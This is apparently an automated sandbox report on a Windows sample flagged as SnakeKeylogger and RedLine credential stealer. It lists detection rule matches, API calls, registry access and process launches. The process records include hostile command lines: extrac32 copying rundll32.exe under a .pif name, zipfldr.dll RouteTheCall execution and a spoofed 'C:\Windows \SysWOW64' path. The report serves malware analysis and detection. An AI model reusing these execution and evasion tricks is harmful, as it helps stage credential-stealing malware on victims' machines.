Source: 13.2.fpnevlzQ.pif.21740f20.6.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 13.2.fpnevlzQ.pif.21740f20.6.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.fpnevlzQ.pif.21740f20.6.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 13.3.fpnevlzQ.pif.1d29f158.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 13.3.fpnevlzQ.pif.1d29f158.0.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.3.fpnevlzQ.pif.1d29f158.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 13.2.fpnevlzQ.pif.1eeb11e6.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 13.2.fpnevlzQ.pif.1eeb11e6.4.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.fpnevlzQ.pif.1eeb11e6.4.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 7.2.fpnevlzQ.pif.30cc0000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 7.2.fpnevlzQ.pif.30cc0000.6.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 7.2.fpnevlzQ.pif.30cc0000.6.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 13.2.fpnevlzQ.pif.21e90000.7.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 13.2.fpnevlzQ.pif.21e90000.7.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.fpnevlzQ.pif.21740f20.6.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 13.2.fpnevlzQ.pif.21e90000.7.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 13.2.fpnevlzQ.pif.21740f20.6.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.fpnevlzQ.pif.21740f20.6.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000007.00000002.3395334268.0000000030CC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000007.00000002.3395334268.0000000030CC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000007.00000002.3395334268.0000000030CC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000007.00000002.3358783454.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0000000D.00000002.3389703614.0000000021740000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0000000D.00000002.3389703614.0000000021740000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000D.00000002.3389703614.0000000021740000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0000000D.00000002.3358705276.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0000000A.00000002.3381513831.000000001F500000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0000000A.00000002.3383592326.000000001F830000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0000000A.00000002.3383592326.000000001F830000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000A.00000002.3383592326.000000001F830000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000007.00000002.3386753422.000000002DE20000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000007.00000001.2117355938.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0000000A.00000003.2241933938.000000001D925000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0000000D.00000002.3390557464.0000000021E90000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0000000D.00000002.3390557464.0000000021E90000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000D.00000002.3390557464.0000000021E90000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000007.00000002.3394138110.0000000030630000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000007.00000002.3394138110.0000000030630000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000007.00000002.3394138110.0000000030630000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0000000D.00000003.2350567700.000000001D29F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0000000D.00000001.2319835034.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000007.00000003.2137425995.000000002C39F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0000000A.00000002.3358753276.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0000000A.00000002.3391545361.0000000021F70000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0000000A.00000002.3391545361.0000000021F70000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000A.00000002.3391545361.0000000021F70000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0000000D.00000002.3379158943.000000001EE70000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0000000A.00000001.2236001285.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: Process Memory Space: fpnevlzQ.pif PID: 7100, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: fpnevlzQ.pif PID: 1440, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: fpnevlzQ.pif PID: 4536, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23

Source: 7.2.fpnevlzQ.pif.30630f20.5.raw.unpack, --.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 7.2.fpnevlzQ.pif.30630f20.5.raw.unpack, -----.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 7.2.fpnevlzQ.pif.30630f20.5.raw.unpack, -----.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 7.3.fpnevlzQ.pif.2c39f308.0.raw.unpack, --.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 7.3.fpnevlzQ.pif.2c39f308.0.raw.unpack, -----.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 7.3.fpnevlzQ.pif.2c39f308.0.raw.unpack, -----.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 7.2.fpnevlzQ.pif.2de611e6.3.raw.unpack, --.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 7.2.fpnevlzQ.pif.2de611e6.3.raw.unpack, -----.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 7.2.fpnevlzQ.pif.2de611e6.3.raw.unpack, -----.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 7.2.fpnevlzQ.pif.30cc0000.6.raw.unpack, --.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 7.2.fpnevlzQ.pif.30cc0000.6.raw.unpack, -----.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 7.2.fpnevlzQ.pif.30cc0000.6.raw.unpack, -----.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: 7.2.fpnevlzQ.pif.30630f20.5.raw.unpack, --.cs	Base64 encoded string: 'GA2I5CTKSEVWGV7K4DFKWQRELRMRX47DHDLY5YONNKJ2VGDOJSK54VYR'
Source: 7.3.fpnevlzQ.pif.2c39f308.0.raw.unpack, --.cs	Base64 encoded string: 'GA2I5CTKSEVWGV7K4DFKWQRELRMRX47DHDLY5YONNKJ2VGDOJSK54VYR'
Source: 7.2.fpnevlzQ.pif.2de611e6.3.raw.unpack, --.cs	Base64 encoded string: 'GA2I5CTKSEVWGV7K4DFKWQRELRMRX47DHDLY5YONNKJ2VGDOJSK54VYR'
Source: 7.2.fpnevlzQ.pif.30cc0000.6.raw.unpack, --.cs	Base64 encoded string: 'GA2I5CTKSEVWGV7K4DFKWQRELRMRX47DHDLY5YONNKJ2VGDOJSK54VYR'
Source: 10.2.fpnevlzQ.pif.1f5411e6.3.raw.unpack, --.cs	Base64 encoded string: 'GA2I5CTKSEVWGV7K4DFKWQRELRMRX47DHDLY5YONNKJ2VGDOJSK54VYR'

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@21/11@3/3

Source: C:\Users\Public\ndpha.pif

Code function: 8_2_00723C66 LoadLibraryExW,GetLastError,FormatMessageW,RtlImageNtHeader,SetProcessMitigationPolicy,

8_2_00723C66

Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe

Code function: 0_2_028A79B2 GetDiskFreeSpaceA,

0_2_028A79B2

Source: C:\Users\Public\Libraries\fpnevlzQ.pif

Code function: 7_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,@__unlockDebuggerData$qv,VariantClear,VariantClear,VariantClear,

7_2_004019F0

Source: C:\Users\Public\ndpha.pif

Code function: 8_2_0072205A CoCreateInstance,

8_2_0072205A

Source: C:\Users\Public\Libraries\fpnevlzQ.pif

7_2_004019F0

Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe

File created: C:\Users\Public\QzlvenpfF.cmd

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4744:120:WilError_03
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5604:120:WilError_03

Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Command line argument: 08A	7_2_00413780
Source: C:\Users\Public\ndpha.pif	Command line argument: WLDP.DLL	8_2_00724136
Source: C:\Users\Public\ndpha.pif	Command line argument: localserver	8_2_00724136
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Command line argument: 08A	10_2_00413780

Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales

Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: fpnevlzQ.pif, 00000007.00000003.2403176329.000000002F17A000.00000004.00000800.00020000.00000000.sdmp, fpnevlzQ.pif, 0000000A.00000003.2470326064.0000000020B4A000.00000004.00000800.00020000.00000000.sdmp, fpnevlzQ.pif, 0000000D.00000003.2559931108.000000002033A000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: PWSW6GK3ZC.exe	Virustotal: Detection: 66%
Source: PWSW6GK3ZC.exe	ReversingLabs: Detection: 68%

Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe

File read: C:\Users\user\Desktop\PWSW6GK3ZC.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\PWSW6GK3ZC.exe "C:\Users\user\Desktop\PWSW6GK3ZC.exe"
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\QzlvenpfF.cmd" "
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\\Qzlvenpf13.cmd" "
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\rundll32.exe C:\\Users\\Public\\ndpha.pif
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Process created: C:\Users\Public\Libraries\fpnevlzQ.pif C:\Users\Public\Libraries\fpnevlzQ.pif
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\Public\ndpha.pif C:\\Users\\Public\\ndpha.pif zipfldr.dll,RouteTheCall C:\Windows \SysWOW64\svchost.pif
Source: unknown	Process created: C:\Users\Public\Libraries\Qzlvenpf.PIF "C:\Users\Public\Libraries\Qzlvenpf.PIF"
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Process created: C:\Users\Public\Libraries\fpnevlzQ.pif C:\Users\Public\Libraries\fpnevlzQ.pif
Source: unknown	Process created: C:\Users\Public\Libraries\Qzlvenpf.PIF "C:\Users\Public\Libraries\Qzlvenpf.PIF"
